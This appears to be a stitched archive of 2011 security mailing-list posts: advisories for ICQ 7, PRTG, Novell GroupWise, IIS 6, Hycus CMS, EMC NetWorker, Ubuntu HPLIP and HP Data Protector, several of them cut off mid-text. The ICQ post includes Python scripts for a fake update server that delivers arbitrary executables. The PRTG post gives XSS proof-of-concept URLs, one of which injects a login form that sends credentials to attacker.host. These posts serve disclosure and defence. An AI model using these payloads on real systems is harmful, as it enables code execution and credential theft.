2010.1/x86_64/libuser-python-0.56.15-3.1mdv2010.2.x86_64.rpm 
 9e651f9eeb0978d060ad26e254c11b64  
2010.1/SRPMS/libuser-0.56.15-3.1mdv2010.2.src.rpm

 Corporate 4.0:
 9070225e84b5ec4c97728927d58b9434  
corporate/4.0/i586/libuser-0.53.2-6.1.20060mlcs4.i586.rpm
 3fca7372f85b38bfb55a9e1e10c75ec0  
corporate/4.0/i586/libuser1-0.53.2-6.1.20060mlcs4.i586.rpm
 7ffeb054b227ea45e44bacbcd7438a53  
corporate/4.0/i586/libuser

Re: Remote Code Execution in ICQ 7

2011-01-27 Thread Daniel Seither
UPDATE:

This week, ICQ 7.4 (build 4561) was released. Even though the original
version of my exploit does not work anymore, the vulnerability was not
resolved: ICQ only changed the product ID that is included in the path
to the update file. If every ocurrence of "30009" in both python files
(see original announcement below) is replaced by "30011" and afterwards,
a new update.xml is generated using build_update_files.py, the attack
will still succeed.

Note to ICQ engineers if they're reading this: To really fix the issue,
introduce cryptographically signed update files.

- Daniel Seither


On 14.01.2011 13:18, Daniel Seither wrote:
> SUMMARY
> 
> The ICQ 7 instant messaging client allows remote code execution due to a
> flaw in its automatic update mechanism.
> 
> 
> VULNERABLE APPLICATIONS
> 
> All versions of ICQ 7 for Windows, up to version 7.2, build 3525 (which
> is the current version)
> 
> ICQ 6 and older versions were not tested.
> 
> Other ICQ clients should not be affected since this is a flaw in the ICQ
> software update mechanism and not in the ICQ IM protocol.
> 
> 
> DETAILS
> 
> ICQ 7 does not check the identity of the update server or the
> authenticity of the updates that it downloads through its automatic
> update mechanism. By impersonating the update server (think DNS
> spoofing), an attacker can act as an update server of its own and
> deliver arbitrary files that are executed on the next launch of the ICQ
> client. Since ICQ is automatically launched right after booting Windows
> by default and it checks for updates on every start, it can be attacked
> very reliably.
> 
> 
> REPRODUCING
> 
> (1) Create the files for the update server (see below,
> build_update_files.py)
> 
> (2) Run a fake update server (see below, run_update_server.py)
> 
> (3) Impersonate the update server. To verify the vulnerability, the
> easiest way is to add an entry for update.icq.com to the victim's
> \Windows\system32\drivers\etc\hosts file that points to the fake update
> server's IP address and clearing it's DNS cache afterwards (ipconfig
> /flushdns).
> 
> The next victim that is affected by the impersonation and that launches
> the ICQ client will now automatically download and install the fake
> update. On the next restart of the ICQ software, the fake ICQ.exe will
> be executed.
> 
> 
> SOLUTION
> 
> Stop using ICQ or switch to another IM client until a fix is released
> since ICQ 7 does not offer to disable automatic updates.
> 
> 
> TIMELINE
> 
> 2010-11-12
> discovered issue
> 
> 2010-11-13
> reported issue to cert.org
> 
> 2010-11-30
> received confirmation from cert.org that they try to contact the vendor
> 
> 2011-01-13
> cert.org publishes vulnerability note because the vendor doesn't react
> 
> 
> REFERENCES
> 
> Vulnerability Note at cert.org:
> http://www.kb.cert.org/vuls/id/680540
> 
> 
> FILES
> 
> === START build_update_files.py ===
> 
> #!/usr/bin/env python
> 
> # ICQ Update File Creator by Daniel Seither (p...@tiwoc.de)
> #
> # Parameter:
> # filename of .exe that should be delivered as an update for ICQ.exe
> #
> # Overwrites ICQ.zip and updates.xml in the current directory
> # without a warning!
> 
> import sys, os
> from hashlib import md5
> from zipfile import ZipFile, ZIP_DEFLATED
> 
> if len(sys.argv) < 2:
>   print "argument missing"
>   sys.exit(1)
> 
> f = open(sys.argv[1])
> payload = f.read()
> f.close()
> 
> payload_checksum = md5(payload).hexdigest()
> payload_size = len(payload)
> 
> f = ZipFile('ICQ.zip', 'w')
> f.write(sys.argv[1], 'ICQ.exe', ZIP_DEFLATED)
> f.close()
>   
> payload_compressed = os.path.getsize('ICQ.zip')
>   
> updatesfile = (''
>   + 'http://update.icq.com/cb/icq6/30009/"/>'
>   + ''
>   + ''
>   + ''
>   ) % (payload_checksum, payload_size, payload_compressed)
> 
> updatesfile_checksum = md5(updatesfile).hexdigest()
> updatesfile = '\r\n%s' % (updatesfile_checksum, updatesfile)
> 
> f = open('updates.xml', 'w')
> f.write(updatesfile)
> f.close
> 
> === END build_update_files.py ===
> 
> === START run_update_server.py ===
> 
> #!/usr/bin/env python
> 
> # Fake ICQ update server by Daniel Seither (p...@tiwoc.de)
> #
> # Must be run
> #  * as root
> #  * from a directory containing updates.xml and ICQ.zip
> #created by build_updates_xml.py
> 
> from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
> 
> class ICQRequestHandler(BaseHTTPRequestHandler):
>   def do_GET(self):
>   if self.path == '/cb/icq6/30009/0/updates.xml':
>   self._respond_with_file('updates.xml')
>   elif self.path == '/cb/icq6/30009/ICQ.zip':
>   self._respond_with_file('ICQ.zip')
>   else:
>   self.send_error(404)
>   
>   def _respond_with_file(self, filename):
>   f = open(filename)
>   self.send_response(200)
>   self.end_headers()
>   

PRTG V8.1.2.1809 XSS Bugs in login.htm and error.htm

2011-01-27 Thread Joshua Gimer
XSS (Reflected) Bugs in login.htm and error.htm

PRTG V8.1.2.1809 (All OS Versions):
http://www.paessler.com/

I have discovered two XSS bugs within PRTG version 8.1.2.1809. These bugs
are in the login.htm and error.htm documents.

These issues were possible because of a lack of input checking of the errormsg
 and errorurl GET parameters within login.htm. Output encoding
routines were also
not consistently used throughout the application.

PoC:

https://localhost/public/login.htm?loginurl=%2Fpublic%2F&errormsg=%3C/div%3E%3C/form%3E%3Ctable%3E%3Cform%20action=%22http://attacker.host/steal.php%22%20method=%22GET%22%3E%3Ctr%3E%3Ctd%3ELogin%20Name:%3C/td%3E%3Ctd%3E%3Cinput%20class=%22text%22%20id=%22loginusername%22%20name=%22username%22%20type=%22text%22%20value=%22%22%20%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput%20class=%22text%22%20%20id=%22loginpassword%22%20name=%22password%22%20type=%22password%22%20value=%22%22%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Ctd%3E%3Cinput%20id=%22submitter%22%20class=%22submit%22%20type=%22submit%22%20value=%22Login%22%3E%3C/td%3E%3C/tr%3E%3C/form%3E%3C/table%3E%3Ciframe%20width=0%20height=0%20src=%22&loginurl=%2Fhome

https://localhost/error.htm?errormsg=%22%3E%3Cimg%20src=%22kaasdfasdf%22%20onerror=%22javascript:alert%28/test/%29%22/%3E&errorurl=%22%3E%3Cimg%20src=%22kaasdfasdf%22%20onerror=%22javascript:alert%28/test/%29%22/%3E

The vendor was very responsive and has fixed these issues in version
8.2.0.1898/189 released on January 17th 2011.

--
Thanks,
Joshua Gimer

---

http://www.linkedin.com/in/jgimer
http://twitter.com/jgimer


VUPEN Security Research - Novell GroupWise "TZID" Variable Remote Buffer Overflow Vulnerability (VUPEN-SR-2011-004)

2011-01-27 Thread VUPEN Security Research
VUPEN Security Research - Novell GroupWise VCALENDAR "TZID" Variable Remote 
Buffer Overflow Vulnerability (VUPEN-SR-2011-004)


http://www.vupen.com/english/research.php


I. BACKGROUND
-

"Novell GroupWise collaboration software is a premier collaboration tool
for large enterprise. Look no further than Novell for your collaboration
software." (Wikipedia)


II. DESCRIPTION
-

VUPEN Vulnerability Research Team discovered a critical vulnerability
in Novell GroupWise.

The vulnerability is caused by a buffer overflow error in the "g1.dll"
module when processing the "TZID" variable within VCALENDAR data, which
could be exploited by remote unauthenticated attackers to execute arbitrary
code with SYSTEM privileges.

CVSS Score: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)


III. AFFECTED PRODUCTS
---

Novell GroupWise version 8.02 HP 1 (Hot Patch 1) and prior


IV. Binary Analysis & Exploits/PoCs
---

In-depth binary analysis of the vulnerability and a code execution exploit
are available through the VUPEN Binary Analysis & Exploits Service :

http://www.vupen.com/english/services/ba-index.php


V. VUPEN Threat Protection Program
---

Organizations and corporations which are members of the VUPEN Threat
Protection Program (TPP) receive advanced notifications about security
vulnerabilities discovered by VUPEN, and have access to a detailed detection
guidance to proactively protect national and critical infrastructures
against potential attacks exploiting this vulnerability:

http://www.vupen.com/english/services/tpp-index.php


VI. SOLUTION


Upgrade to Novell GroupWise version 8.02 HP 2 (Hot Patch 2).


VII. CREDIT
--

This vulnerability was discovered by Sebastien Renaud of VUPEN Security


VIII. ABOUT VUPEN Security
---

VUPEN is a leading IT security research company providing vulnerability
management and security intelligence solutions which enable enterprises
and institutions to eliminate vulnerabilities before they can be exploited,
ensure security policy compliance and meaningfully measure and manage risks.

Governmental and federal agencies, and global enterprises in the financial
services, insurance, manufacturing and technology industries rely on VUPEN
to improve their security, prioritize resources, cut time and costs, and
stay ahead of the latest threats.

* VUPEN Vulnerability Notification Service (VNS) :
http://www.vupen.com/english/services/vns-index.php

* VUPEN Binary Analysis & Exploits Service (BAE) :
http://www.vupen.com/english/services/ba-index.php

* VUPEN Threat Protection Program for Govs (TPP) :
http://www.vupen.com/english/services/tpp-index.php

* VUPEN Web Application Security Scanner (WASS) :
http://www.vupen.com/english/services/wass-index.php


IX. REFERENCES
--

http://www.vupen.com/english/research-vuln.php
http://www.vupen.com/english/advisories/2011/0220
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4325
http://www.novell.com/support/viewContent.do?externalId=7007638&sliceId=1


X. DISCLOSURE TIMELINE
-

2010-11-22 - Vulnerability discovered
2010-xx-xx - Vulnerability rediscovered by third parties including ZDI
2011-01-25 - Novell fix released




Microsoft IIS 6 parsing directory �x.asp� Vulnerability

2011-01-27 Thread info


# Microsoft IIS 6 parsing directory Vulnerability



#Discovered by: 

Pouya daneshmand

whh_iran[AT]yahoo[DOT]com

http://securitylab.ir/blog



#Introduction:

Using this vulnerability you can bypass some Security filters, for example a 
file with “.jpg” or “.rar” extension can be executed as an asp (Active Server 
Page) file.



#Vulnerable:

It just works for asp files and works on Windows 2003 / IIS 6 (As I tested...).

The test failed on IIS 5.1 and IIS 7.





#Description:

1) Create a Folder with '.asp' extension.

2) Insert your ASP code in a file with any extension (like .jpg,.rar,.txt) in 
the folder you have created.

3) Open the file with your browser and you will see it's executed as an asp 
file!



#Note:

The Extension of file does not matter at all!





#Solution:

There is no patch to fix this security vulnerability yet, the best thing I can 
say is to DISABLE ASP FILES FROM YOUR "web server extensions"! Or Remove 
“execute” permission from the upload directories.







#PS:

This vulnerability was reported for first time at 2010-06-19 in Persian 
(http://sebug.net/vulndb/19820/)



#Original Advisory:

http://securitylab.ir/blog/dl/Microsoft-IIS6-parsing-directory-Vulnerability.pdf

http://securitylab.ir/blog/posts/11/Microsoft-IIS-6-parsing-directory-%E2%80%9Cx.asp%E2%80%9D-Vulnerability/


HTB22795: Path disclosure in Hycus CMS

2011-01-27 Thread advisory
Vulnerability ID: HTB22795
Reference: http://www.htbridge.ch/advisory/path_disclousure_in_hycus_cms.html
Product: Hycus CMS
Vendor: Hycus Web Development Team ( http://www.hycus.com/ ) 
Vulnerable Version: 1.0.3 and probably prior versions
Vendor Notification: 13 January 2011 
Vulnerability Type: Path disclosure
Status: Awaiting Vendor Response
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the 
"/templates/hycus_template/template.php" script, it's possible to generate an 
error that will reveal the full path of the script.
A remote user can determine the full path to the web root directory and other 
potentially sensitive information.

http://host/templates/hycus_template/template.php




ESA-2011-003: EMC NetWorker librpc.dll spoofing vulnerability.

2011-01-27 Thread Security_Alert

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

ESA-2011-003: EMC NetWorker librpc.dll spoofing vulnerability.


EMC Identifier: ESA-2011-003

CVE Identifier: CVE-2011-0321


Severity Rating: CVSS v2 Base Score: 8.5 (AV:N/AC:L/Au:N/C:P/I:N/A:C)


Affected products:
EMC NetWorker earlier than 7.5.3.5
EMC NetWorker earlier than 7.6.1.2


Vulnerability Summary:
A vulnerability exists in EMC NetWorker which can be exploited to potentially 
create a denial of service condition or eavesdrop on process communications.


Vulnerability Details:
EMC Networker uses an RPC library to provide a portmapper service within 
nsrexecd. The portmapper restricts access for service commands to the 
localhost. However, the UDP protocol allows malicious users to spoof the source 
address of the network packet making it appear it originated from the 
localhost. This potentially may allow  a remote malicious user to unregister 
existing NetWorker RPC services or register new RPC services.


Problem Resolution:
The following EMC NetWorker products contain resolutions to this issue:


EMC NetWorker version 7.5.3.5
EMC NetWorker version 7.5 SP4 and later
EMC NetWorker version 7.6.1.2 and later


EMC strongly recommends all customers apply the latest patches which contain 
the resolution to this issue, at the earliest opportunity.


Link to remedies:


For 7.5 SP3 and earlier users:
This fix is available  in build 7.5.3.5 and 7.5 SP4.  EMC recommends updating 
to the 7.5 SP4 version.  Registered EMC Powerlink customers can download the 
NetWorker 7.5 SP4 software from Powerlink. For NetWorker Software, navigate in 
Powerlink to Home > Support > Software Downloads and Licensing > Downloads J-O 
> NetWorker.


For 7.6 SP1 and 7.6 users:
The fix is available in 7.6.1.2 and subsequent cumulative build releases.  For 
details on the 7.6.1.x cumulative fix releases including download details, 
refer to the NetWorker 7.6 Cumulative Hotfix Summary document on EMC Powerlink.


Because the view is restricted based on customer agreements, you may not have 
permission to view certain downloads. Should you not see a software download 
you believe you should have access to, follow the instructions in EMC 
Knowledgebase solution emc116045.


For explanation of Severity Ratings, refer to EMC Knowledgebase solution 
emc218831. EMC recommends that all customers take into account both the base 
score and any relevant temporal and environmental scores, which may impact the 
potential severity associated with particular security vulnerability.


Credits:
EMC would like to thank an anonymous researcher working with TippingPoint's 
Zero Day Initiative (http://www.zerodayinitiative.com) for reporting this issue.


EMC Corporation distributes EMC Security Advisories in order to bring to the 
attention of users of the affected EMC products important security information. 
EMC recommends all users determine the applicability of this information to 
their individual situations and take appropriate action. The information set 
forth herein is provided "as is" without warranty of any kind. EMC disclaims 
all warranties, either express or implied, including the warranties of 
merchantability, fitness for a particular purpose, title and non-infringement. 
In no event shall EMC or its suppliers be liable for any damages whatsoever 
including direct, indirect, incidental, consequential, loss of business profits 
or special damages, even if EMC or its suppliers have been advised of the 
possibility of such damages. Some states do not allow the exclusion or 
limitation of liability for consequential or incidental damages so the 
foregoing limitation may not apply.


EMC Product Security Response Center
security_al...@emc.com
http://www.emc.com/contact-us/contact/product-security-response-center.htm


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (Cygwin)

iEYEARECAAYFAk1AmSsACgkQtjd2rKp+ALyxkwCeIB5VSY1U6/1h/yWAluRlERtj
40sAoIHN3TfWLIq+t9wR0WtmYQknZVws
=ddyY
-END PGP SIGNATURE-


[USN-1051-1] HPLIP vulnerability

2011-01-27 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-1051-1  January 25, 2011
hplip vulnerability
CVE-2010-4267
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 9.10
Ubuntu 10.04 LTS
Ubuntu 10.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  hplip   2.8.2-0ubuntu8.2

Ubuntu 9.10:
  hplip   3.9.8-1ubuntu2.1

Ubuntu 10.04 LTS:
  hplip   3.10.2-2ubuntu2.2

Ubuntu 10.10:
  hplip   3.10.6-1ubuntu10.2

In general, a standard system update will make all the necessary changes.

Details follow:

Sebastian Krahmer discovered that HPLIP incorrectly handled certain long
SNMP responses. A remote attacker could send malicious SNMP replies to
certain HPLIP tools and cause them to crash or possibly execute arbitrary
code.


Updated packages for Ubuntu 8.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.8.2-0ubuntu8.2.diff.gz
  Size/MD5:78384 a609e82f554318d5bbdfd27632aac0d7

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.8.2-0ubuntu8.2.dsc
  Size/MD5: 1958 41b1bf5566d664b0621eb6463feac578
http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.8.2.orig.tar.gz
  Size/MD5: 14195737 ea57b92483622d3eae359994c5fd3dc3

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs-ppds_2.8.2+2.8.2-0ubuntu8.2_all.deb
  Size/MD5:  1529562 06996ed3451b696d402e86743be75aa6

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-data_2.8.2-0ubuntu8.2_all.deb
  Size/MD5:  7019388 12bbd8af2557985100184fa97d376c9f

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-doc_2.8.2-0ubuntu8.2_all.deb
  Size/MD5:  4167650 fe60550b24dd91ffa89056539f26931e

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-gui_2.8.2-0ubuntu8.2_all.deb
  Size/MD5:   128466 e18fa06397d94412b4df566915273f2c

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.8.2+2.8.2-0ubuntu8.2_amd64.deb
  Size/MD5:   382342 3cce7d39faddf51df4f7aab06f253ffb

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.8.2-0ubuntu8.2_amd64.deb
  Size/MD5:   811700 58acebac939cd452a2661cefe9572a08

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.8.2-0ubuntu8.2_amd64.deb
  Size/MD5:   321006 24139fdee705999ee79118463bbe4912

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.8.2+2.8.2-0ubuntu8.2_i386.deb
  Size/MD5:   374298 8ed6b85295c473b8aa62f52d6d3c499b

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.8.2-0ubuntu8.2_i386.deb
  Size/MD5:   788212 2ad39471fdbbe28865e6da6c2da629ca

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.8.2-0ubuntu8.2_i386.deb
  Size/MD5:   308746 82813ba1cc72945a104761b0c3bd9998

  lpia architecture (Low Power Intel Architecture):


http://ports.ubuntu.com/pool/main/h/hplip/hpijs_2.8.2+2.8.2-0ubuntu8.2_lpia.deb
  Size/MD5:   377158 c673232d8aab4de7683b04dcf3d9fdfd

http://ports.ubuntu.com/pool/main/h/hplip/hplip-dbg_2.8.2-0ubuntu8.2_lpia.deb
  Size/MD5:   794602 cbe69bf6dc2f2b7d999b95d8dcbfa619
http://ports.ubuntu.com/pool/main/h/hplip/hplip_2.8.2-0ubuntu8.2_lpia.deb
  Size/MD5:   307760 9075374da700578984bdcb6ffc0f3573

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://ports.ubuntu.com/pool/main/h/hplip/hpijs_2.8.2+2.8.2-0ubuntu8.2_powerpc.deb
  Size/MD5:   388460 50aaf8b7160ae90485d4c4c0345e970e

http://ports.ubuntu.com/pool/main/h/hplip/hplip-dbg_2.8.2-0ubuntu8.2_powerpc.deb
  Size/MD5:   824864 fd0b586edf940365ddfd00cbb62a2ac0
http://ports.ubuntu.com/pool/main/h/hplip/hplip_2.8.2-0ubuntu8.2_powerpc.deb
  Size/MD5:   337010 83552e1c1c18617aa5bad08a141009a8

  sparc architecture (Sun SPARC/UltraSPARC):


http://ports.ubuntu.com/pool/main/h/hplip/hpijs_2.8.2+2.8.2-0ubuntu8.2_sparc.deb
  Size/MD5:   371608 e71a3697c81d7aea3f7b0ad28e573863

http://ports.ubuntu.com/pool/main/h/hplip/hplip-dbg_2.8.2-0ubuntu8.2_sparc.deb
  Size/MD5:   755986 e60ec90f9bf59b28dfebda6889dd82ba
http://ports.ubuntu.com/pool/main/h/hplip/hplip_2.8.2-0ubuntu8.2_sparc.deb
  Size/MD5:   307220 b7399af191ff0d7995f5ebfd16f37daf

Updated packages for Ubuntu 9.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_3.9.8-1ubuntu2.1.diff.gz
  Size/MD5:91802 5c588019ec33661ddeaa748c9b2a00d7

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_3.9.8-1ubuntu2.1.dsc
  Size/MD5: 2521 ac59f7004536fe

[security bulletin] HPSBMA02626 SSRT100301 rev.1 - HP OpenView Storage Data Protector, Remote Denial of Service (DoS)

2011-01-27 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02699143
Version: 1

HPSBMA02626 SSRT100301 rev.1 - HP OpenView Storage Data Protector, Remote 
Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2011-01-24
Last Updated: 2011-01-24

 --

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP OpenView Storage 
Data Protector. The vulnerability could be remotely exploited to create a 
Denial of Service (DoS).

References: CVE-2011-0275

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView Storage Data Protector v6.11 running on Windows 2000, XP, 2003, 
2008 or Vista.
HP OpenView Storage Data Protector v6.10 running on Windows 2000, XP, 2003, 
2008 or Vista.
HP OpenView Storage Data Protector v6.0 running on Windows 2000, XP, 2003.

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2011-0275(AV:N/AC:M/Au:N/C:N/I:N/A:C)   7.1
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided the following software patches to resolve this vulnerability.

Operating System / Description / Patch ID

Windows Vista, XP, 2008, 2003, 2000 / OV DP 6.11 Win - Core / DPWIN_00475

Windows Vista, XP, 2008, 2003, 2000 / OV DP 6.10 Win - Core / DPWIN_00489

Windows XP, 2003, 2000 / OV DP 6.00 Win - Core / DPWIN_00488

The patches are available for download from
http://support.openview.hp.com/selfsolve/patches

MANUAL ACTIONS: No

HISTORY
Version: 1 (rev.1) - 24 January 2011 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-al...@hp.com
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.

To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.

"HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP products the important security 
information contained in this Bulletin. HP recommends that all users determine 
the applicability of this information to their individual situations and take 
appropriate action. HP does not warrant that this information is necessarily 
accurate or complete for all user situations and, consequently, HP will not be 
responsible for any damages resulting from user's use or disregard of the 
information provided in this Bulletin. To the extent permitted by law, HP 
disclaims all warranties, either express or implied, including the warranties 
of merchantability and fitness for a particular purpose, title and 
non-infringement."

Copyright 2